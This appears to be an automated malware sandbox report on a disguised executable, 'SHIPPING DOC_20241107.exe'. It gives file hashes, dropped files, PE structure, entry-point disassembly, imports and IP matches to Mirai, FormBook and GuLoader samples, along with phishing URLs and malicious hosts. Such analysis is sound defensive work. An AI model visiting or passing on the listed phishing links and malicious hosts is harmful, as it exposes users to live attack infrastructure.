                                                                                                          https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 31.22.4.60
                                                                                                          http://reactivar-email002003.hstn.me/Get hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.98
                                                                                                          http://instagram.totalh.net/Get hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.215
                                                                                                          gYYKUhFeTl.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.11
                                                                                                          COGENT-174USsora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 38.150.180.178
                                                                                                          proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 206.119.81.36
                                                                                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 38.89.199.238
                                                                                                          pSU7fuySjo.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 149.30.15.190
                                                                                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 38.154.20.178
                                                                                                          qPZwB2nc1W.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 149.66.96.211
                                                                                                          C6IlHsFs4g.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 38.93.130.203
                                                                                                          Hesap.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 206.119.82.148
                                                                                                          http://profdentalcare.comGet hashmaliciousUnknownBrowse
                                                                                                          • 38.33.75.195
                                                                                                          BkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 206.119.81.36
                                                                                                          LINODE-APLinodeLLCUShttps://majorbrdide.comGet hashmaliciousUnknownBrowse
                                                                                                          • 173.255.204.62
                                                                                                          DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 45.79.252.94
                                                                                                          sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 212.71.245.12
                                                                                                          https://www.usatraveldocs.com/inGet hashmaliciousUnknownBrowse
                                                                                                          • 45.33.30.197
                                                                                                          update.htaGet hashmaliciousCobalt Strike, SliverBrowse
                                                                                                          • 23.239.28.166
                                                                                                          SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 178.79.184.196
                                                                                                          5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 45.33.20.235
                                                                                                          5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 45.33.18.44
                                                                                                          K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 45.33.2.79
                                                                                                          K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 45.56.79.23
                                                                                                          No context
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\sqlite3.dllSecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                                                                                                            irlsever.docGet hashmaliciousFormBookBrowse
                                                                                                              Price and inventory information PO70964311.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.12710.16004.rtfGet hashmaliciousFormBookBrowse
                                                                                                                  Commande_P125350_-_UES.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                    doc19399020230418170547.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      CustomsXIDXXXPhotos.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                        ORDER (1).xlsGet hashmaliciousFormBookBrowse
                                                                                                                          TedarikciSiparisi_83613 .xlsGet hashmaliciousFormBookBrowse
                                                                                                                            Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):510251
                                                                                                                            Entropy (8bit):7.998734132980969
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:YADSfMz+n/gRtFbWn6qnnTJT/+3eBmvFmJpBEGp:YARkGtEn64N/UeQduBBp
                                                                                                                            MD5:8517BF92C0FD6228875BA74B2526B3B4
                                                                                                                            SHA1:7AA157FEED160F7E207CE961AAEE21E3075B3AB9
                                                                                                                            SHA-256:536AD85A299F5F7AFC36F5944EA55D9F32495491265BF1305A41B3667176998D
                                                                                                                            SHA-512:929C686123EB405C258D3ECE2466B69F641041C2E2B7A4C13C7EFA58A6654B387AC1EE4F7C643E70C84B38EDDF39ECCC6F816420E731E899468C9AB0FB9A2732
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:PK.........lR.PX.j...........sqlite3.defUT....K`.K`ux.................&....6......9.$..(l.nv0x.......t#..9.............?...?...".9.d.1[..#.%......!...y.I.o...2._Z.0.......q..Z..pT.."&m......b.3E.-..g.........&..G..Lh.o#..98..]<....j.K...>...VwJ....n.<G...8...N..%.WW..W..M\.Y45@.A.`c..,.......F..5H....D1=G...o.X.e.u..X`y* ......w..Ia?.;T...r..#s..._p.Y...O+|0..I..W..J.#..Y.65.@D.<<....J..h .6.r`-.L..w....7.....{l..H.g.....t.ieV..aR[,S..*...i...S.]...(8e+..]x4.h.;.w.K...v..QN:....m....XHJ.;..90a._h.Y..Xu$.U...H:3...d.....L....g..P..v....bM.)F.C..*t.(.._.j..... +....b.y.*sn....~k.....Ps4|.L..Z..@@.r..z.n....:.$.'.7...Y.`.......6:#.S...'.Lw....g.3..a.......H:2.L.Cj<.l..#.w....Ch......)......G...nW.+...o=e.p..Z...zpA8{U."..PQ.h.a.O..Y.:......v....!9..<Bb..-...r...*..|....:..9.E.Df....1.9...{...w....{..+...]..Dh=..!+...e#w).p.E(.c.....|i..;..M.C..Rx..{..v7(.....1.'..7 Op.=..K.a..al.L...P.<..b............y...Vg....^....(..UB..:....'..+|}...41......i8].K
                                                                                                                            Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):77824
                                                                                                                            Entropy (8bit):1.133993246026424
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):510251
                                                                                                                            Entropy (8bit):7.998734132980969
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:YADSfMz+n/gRtFbWn6qnnTJT/+3eBmvFmJpBEGp:YARkGtEn64N/UeQduBBp
                                                                                                                            MD5:8517BF92C0FD6228875BA74B2526B3B4
                                                                                                                            SHA1:7AA157FEED160F7E207CE961AAEE21E3075B3AB9
                                                                                                                            SHA-256:536AD85A299F5F7AFC36F5944EA55D9F32495491265BF1305A41B3667176998D
                                                                                                                            SHA-512:929C686123EB405C258D3ECE2466B69F641041C2E2B7A4C13C7EFA58A6654B387AC1EE4F7C643E70C84B38EDDF39ECCC6F816420E731E899468C9AB0FB9A2732
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:PK.........lR.PX.j...........sqlite3.defUT....K`.K`ux.................&....6......9.$..(l.nv0x.......t#..9.............?...?...".9.d.1[..#.%......!...y.I.o...2._Z.0.......q..Z..pT.."&m......b.3E.-..g.........&..G..Lh.o#..98..]<....j.K...>...VwJ....n.<G...8...N..%.WW..W..M\.Y45@.A.`c..,.......F..5H....D1=G...o.X.e.u..X`y* ......w..Ia?.;T...r..#s..._p.Y...O+|0..I..W..J.#..Y.65.@D.<<....J..h .6.r`-.L..w....7.....{l..H.g.....t.ieV..aR[,S..*...i...S.]...(8e+..]x4.h.;.w.K...v..QN:....m....XHJ.;..90a._h.Y..Xu$.U...H:3...d.....L....g..P..v....bM.)F.C..*t.(.._.j..... +....b.y.*sn....~k.....Ps4|.L..Z..@@.r..z.n....:.$.'.7...Y.`.......6:#.S...'.Lw....g.3..a.......H:2.L.Cj<.l..#.w....Ch......)......G...nW.+...o=e.p..Z...zpA8{U."..PQ.h.a.O..Y.:......v....!9..<Bb..-...r...*..|....:..9.E.Df....1.9...{...w....{..+...]..Dh=..!+...e#w).p.E(.c.....|i..;..M.C..Rx..{..v7(.....1.'..7 Op.=..K.a..al.L...P.<..b............y...Vg....^....(..UB..:....'..+|}...41......i8].K
                                                                                                                            Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5811
                                                                                                                            Entropy (8bit):4.352284042076067
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:GcuN/gR+7Ggb9XdMcAM3KOGOF++hwIOVtvaENw+Y0aR:E/Q+7Ggb9bKOBF++ebvaENw+cR
                                                                                                                            MD5:9C6E5D67D33790CB6967BFB3BA641A0F
                                                                                                                            SHA1:B2CDC4F1A60ABE206EE8F336AA0FBF85B5319E9B
                                                                                                                            SHA-256:2CA96E058F5F06ED9C587315E1BBAFD70928F9503BEBE952D874C157428C6F93
                                                                                                                            SHA-512:C17648697C26C64F0244B6BB9DB5B22314EE3E3EC7A2ED93D426A37C961B7DBB43E6BF5ACFA2487F9B92F9DC33BEFD675C0D43C7ACAD225329C70E6315784B41
                                                                                                                            Malicious:false
                                                                                                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum
                                                                                                                            Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):972779
                                                                                                                            Entropy (8bit):6.508188536943286
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:XDEAIY5U9dDfmrw3xnhMRCFxJLjt0+J9G6p1pKfd+8EkzpGtE3RcAx:z9hu9FfmkBnh0CFj2+Jn1pKf3720cAx
                                                                                                                            MD5:38A3E021EB32C9976ADAF0B3372080FC
                                                                                                                            SHA1:68E02803C646BE21007D90BEC841C176B82211FD
                                                                                                                            SHA-256:8CDE0275D60DA0D11954F73C7C8862CFC4B306F61BB8B1CE14ABE4A193AF2652
                                                                                                                            SHA-512:B886CC112F2750E7300B66F7242850659FA49FDC97F75AED376CB9F5440875F303A143BF8B51068EC42674F1EBE1DFCC40534F3A7AED3CC4D20F9274B9A66D18
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsx, Detection: malicious, Browse
                                                                                                                            • Filename: irlsever.doc, Detection: malicious, Browse
                                                                                                                            • Filename: Price and inventory information PO70964311.pdf.exe, Detection: malicious, Browse
                                                                                                                            • Filename: SecuriteInfo.com.Exploit.CVE-2018-0798.4.12710.16004.rtf, Detection: malicious, Browse
                                                                                                                            • Filename: Commande_P125350_-_UES.xls, Detection: malicious, Browse
                                                                                                                            • Filename: doc19399020230418170547.xls, Detection: malicious, Browse
                                                                                                                            • Filename: CustomsXIDXXXPhotos.xlsx, Detection: malicious, Browse
                                                                                                                            • Filename: ORDER (1).xls, Detection: malicious, Browse
                                                                                                                            • Filename: TedarikciSiparisi_83613 .xls, Detection: malicious, Browse
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`...........!......................... .....a.........................p.......o........ .........................'"......H...............................`6..................................................................................text...T...........................`.P`.data........ ......................@.`..rdata..t-...@.......0..............@.`@.bss....(....p........................`..edata..'".......$...^..............@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..`6.......8..................@.0B/4...........0......................@.@B/19.........@......................@..B/31..................p..............@..B/45.................................@..B/57.......... ......................@.0B/70.....i....0..........
                                                                                                                            Process:C:\Users\user\Desktop\SHIPPING DOC_20241107.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):7.995918963791684
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:p0Bs/f1zBlgyus3aNMA53BIdZAz4BhTVnumoQ9IeF16p8U:y+tBy/sq6CIH24BhxRoCIeF16p3
                                                                                                                            MD5:138A146C2E0A8C09B0E0B742BAC7F84F
                                                                                                                            SHA1:8ECB2DE3E8DBFF16C05A5B84567453ACB962EEC5
                                                                                                                            SHA-256:034837CAFBD1A9EAC93F2FD4B9C38E79660865FA83BA46977B6CE26AB694434B
                                                                                                                            SHA-512:B1F0BCAEB25B440D5247A041AA30E54AD3A586A5A9BC6AC8B1161F1EB2E9C9D52A7628FF475C9F245368854BB40DA656EFA0097F2086B6EF78E21A1529D38B51
                                                                                                                            Malicious:false
                                                                                                                            Preview:z....EQBLn.]...l.C4..qFY...RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C.JSGWZ.LL.[.u.4..ql+^9s7+*60-[r754[9"pZ&.8&)y,?b.y.t95Q3x]5I.JSGYEQB57[.i:R.k0_..*4.C...vV5.N...j0_.-...e%6.._1<i:R.VP8C7JSG..QB.7ST..s.VP8C7JSG.ESCG7YTT.1VVP8C7JSG.QQBL&RTT*1VVPxC7ZSGYGQBJ6RTTZ5VPP8C7JSGY5UBL4RTTZ5VTPx.7JCGYUQBL6BTTJ5VVP8C'JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTz.P."P8C..WGYUQBL`VTTJ5VVP8C7JSGYEQBl6R4TZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C7JSGYEQBL6RTTZ5VVP8C
                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):7.444163113134078
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:SHIPPING DOC_20241107.exe
                                                                                                                            File size:1'536'512 bytes
                                                                                                                            MD5:6fc4f6b2894fa46c60c67d2b8defd64e
                                                                                                                            SHA1:9af4784d85e8ac730c38de094088f93c433d1e3e
                                                                                                                            SHA256:392d0101e35db0734783ac87d4dd920f178b414cd0027eedd391fc0fcadc5798
                                                                                                                            SHA512:a53e7d6006bee63d3048c287d716ed8623881de986089e33393649fd62638c91c33cf050d17ed201c3466d3fa8db280b3f8407fdc8043f8243433ac57200f08b
                                                                                                                            SSDEEP:24576:FCdxte/80jYLT3U1jfsWaxJO7CKGrSeYDuzrxNCD4YHgfKCuVQ:Mw80cTsjkWaxJ2GrkuzlNCD4YHgfv
                                                                                                                            TLSH:F665D02273DDC360CB769173BF6A77016EBB78614630B85B2F880D7DA950172162DBA3
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                                            Icon Hash:aaf3e3e3938382a0
                                                                                                                            Entrypoint:0x427f4a
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x672BFA29 [Wed Nov 6 23:22:17 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:5
                                                                                                                            OS Version Minor:1
                                                                                                                            File Version Major:5
                                                                                                                            File Version Minor:1
                                                                                                                            Subsystem Version Major:5
                                                                                                                            Subsystem Version Minor:1
                                                                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                            Instruction
                                                                                                                            call 00007FDF3C6D72CDh
                                                                                                                            jmp 00007FDF3C6CA094h
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            push edi
                                                                                                                            push esi
                                                                                                                            mov esi, dword ptr [esp+10h]
                                                                                                                            mov ecx, dword ptr [esp+14h]
                                                                                                                            mov edi, dword ptr [esp+0Ch]
                                                                                                                            mov eax, ecx
                                                                                                                            mov edx, ecx
                                                                                                                            add eax, esi
                                                                                                                            cmp edi, esi
                                                                                                                            jbe 00007FDF3C6CA21Ah
                                                                                                                            cmp edi, eax
                                                                                                                            jc 00007FDF3C6CA57Eh
                                                                                                                            bt dword ptr [004C31FCh], 01h
                                                                                                                            jnc 00007FDF3C6CA219h
                                                                                                                            rep movsb
                                                                                                                            jmp 00007FDF3C6CA52Ch
                                                                                                                            cmp ecx, 00000080h
                                                                                                                            jc 00007FDF3C6CA3E4h
                                                                                                                            mov eax, edi
                                                                                                                            xor eax, esi
                                                                                                                            test eax, 0000000Fh
                                                                                                                            jne 00007FDF3C6CA220h
                                                                                                                            bt dword ptr [004BE324h], 01h
                                                                                                                            jc 00007FDF3C6CA6F0h
                                                                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                                                                            jnc 00007FDF3C6CA3BDh
                                                                                                                            test edi, 00000003h
                                                                                                                            jne 00007FDF3C6CA3CEh
                                                                                                                            test esi, 00000003h
                                                                                                                            jne 00007FDF3C6CA3ADh
                                                                                                                            bt edi, 02h
                                                                                                                            jnc 00007FDF3C6CA21Fh
                                                                                                                            mov eax, dword ptr [esi]
                                                                                                                            sub ecx, 04h
                                                                                                                            lea esi, dword ptr [esi+04h]
                                                                                                                            mov dword ptr [edi], eax
                                                                                                                            lea edi, dword ptr [edi+04h]
                                                                                                                            bt edi, 03h
                                                                                                                            jnc 00007FDF3C6CA223h
                                                                                                                            movq xmm1, qword ptr [esi]
                                                                                                                            sub ecx, 08h
                                                                                                                            lea esi, dword ptr [esi+08h]
                                                                                                                            movq qword ptr [edi], xmm1
                                                                                                                            lea edi, dword ptr [edi+08h]
                                                                                                                            test esi, 00000007h
                                                                                                                            je 00007FDF3C6CA275h
                                                                                                                            bt esi, 03h
                                                                                                                            Programming Language:
                                                                                                                            • [ASM] VS2013 build 21005
                                                                                                                            • [ C ] VS2013 build 21005
                                                                                                                            • [C++] VS2013 build 21005
                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                            • [ASM] VS2013 UPD5 build 40629
                                                                                                                            • [RES] VS2013 build 21005
                                                                                                                            • [LNK] VS2013 UPD5 build 40629
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000xae890.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1760000x7130.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x8dd2e0x8de00c2c2260508750422d20cd5cbb116b146False0.5729952505506608data6.675875439961112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x8f0000x2e10e0x2e2004513b58651e3d8d87c81a396e5b2f1d1False0.3353340955284553OpenPGP Public Key5.760731648769018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0xbe0000x8f740x5200c2de4a3d214eae7e87c7bfc06bd79775False0.1017530487804878data1.1988106744719143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rsrc0xc70000xae8900xaea00f4d01413943cc6679afb5d39c5a83c57False0.9633701682176091data7.963227739874961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x1760000x71300x72001254908a9a03d2bcf12045d49cd572b9False0.7703536184210527data6.782377328042204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_ICON0xc74a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                            RT_ICON0xc75c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                            RT_ICON0xc78b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                            RT_ICON0xc79d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                            RT_ICON0xc88800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                            RT_ICON0xc91280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                            RT_ICON0xc96900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                            RT_ICON0xcbc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                            RT_ICON0xccce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                            RT_STRING0xcd1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                            RT_STRING0xcd6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                            RT_STRING0xcdd680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                            RT_STRING0xce1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                            RT_STRING0xce7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                            RT_STRING0xcee500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                            RT_STRING0xcf2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                            RT_RCDATA0xcf4100xa5f28data1.0003177779085506
                                                                                                                            RT_GROUP_ICON0x1753380x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                            RT_GROUP_ICON0x1753b00x14dataEnglishGreat Britain1.15
                                                                                                                            RT_VERSION0x1753c40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                            RT_MANIFEST0x1754a00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                            DLLImport
                                                                                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                            UxTheme.dllIsThemeActive
